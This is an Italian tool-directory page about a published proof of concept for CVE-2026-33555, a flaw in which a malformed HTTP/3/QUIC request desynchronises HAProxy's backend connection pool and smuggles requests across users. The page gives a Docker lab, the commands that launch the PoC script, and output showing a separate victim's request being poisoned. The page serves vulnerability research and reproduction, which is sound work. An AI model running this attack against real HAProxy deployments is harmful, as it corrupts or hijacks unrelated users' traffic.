Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-33555 — Un pacchetto QUIC di zero byte è sufficiente per desincronizzare il connection pool di backend di HAProxy e introdurre richieste HTTP attraverso utenti non correlati — anche utenti su un protocollo frontend completamente diverso. | Kitploit
Strumenti/GitHubGitHub/r3verii/cve-2026-33555
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebSicurezza di RetePaper e Ricerca
GitHubr3verii/cve-2026-33555

CVE-2026-33555

Un pacchetto QUIC di zero byte è sufficiente per desincronizzare il connection pool di backend di HAProxy e introdurre richieste HTTP attraverso utenti non correlati — anche utenti su un protocollo frontend completamente diverso.

Vedi Repository
24 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Bypass della Validazione del Body FIN Standalone in HAProxy H3/QUIC tramite HTTP Request Smuggling

Post completo qui : https://r3verii.github.io/cve/2026/04/14/haproxy-h3-standalone-fin-smuggling.html

Riepilogo

Una vulnerabilità nell'implementazione HTTP/3 di HAProxy consente a un attaccante di inviare una richiesta HTTP con un header Content-Length che non corrisponde alla dimensione effettiva del body. HAProxy inoltra questa richiesta malformata al backend tramite HTTP/1.1 con il Content-Length dichiarato ma zero byte di body. Quando il backend invia una risposta anticipata (es. redirect 301) e scarica il body pendente dalla connessione TCP, consuma byte appartenenti alla successiva richiesta HTTP su quella connessione — che potrebbe provenire da un utente diverso.

Ciò comporta HTTP request smuggling tra utenti tramite il connection pool del backend di HAProxy.

Versioni interessate: HAProxy con supporto QUIC/H3 (USE_QUIC=1). Testato su HAProxy 3.0.18. Configurazione richiesta: http-reuse always (non predefinita, ma comune in produzione)

Configurazione del Lab

Docker Compose con 3 servizi:

  • haproxy: Frontend H3/QUIC (porta 10002/udp) + H2/TCP (porta 10002/tcp), connection pooling del backend (http-reuse always)
  • nginx: Nginx 1.27 standard con autoindex on sulla directory /photos, /status restituisce 200
  • client: Container Python con aioquic

Passaggi

root@kitploit:~
# 1. Avvia il lab (la build di HAProxy richiede ~10 min la prima volta)
cd poc/
docker compose up -d --build

# 2. Esegui il PoC in modalità continua
docker exec -it poc-client python3 poc.py --target haproxy --port 10002 --interval 3

# 3. Da un browser, naviga su https://<host>:10002/status
#    (accetta il certificato self-signed, usa --ignore-certificate-errors in Chrome)
#    Aggiorna ripetutamente. ~50% delle risposte saranno 400 Bad Request.

# 4. Ferma il PoC (Ctrl+C). Tutte le risposte del browser tornano alla normalità (200).

Verifica a colpo singolo

root@kitploit:~
docker exec -it poc-client python3 poc.py --target haproxy --port 10002 --once

Output atteso:

root@kitploit:~
[1] Invio della richiesta poison (H3/QUIC)...
    -> 301 ricevuto. Connessione backend nel pool con body pendente da scaricare.
[2] Attesa di 0.5s affinché HAProxy inserisca la connessione nel pool...
[3] Invio della richiesta victim GET /status da una connessione QUIC SEPARATA...
    -> Risposta: HTTP 400

  [!] SMUGGLING CONFERMATO
  [!] La victim su connessione separata ha ricevuto 400 invece di 200
  [!] Il backend ha interpretato la richiesta della victim come body del POST poison
Scarica lo strumento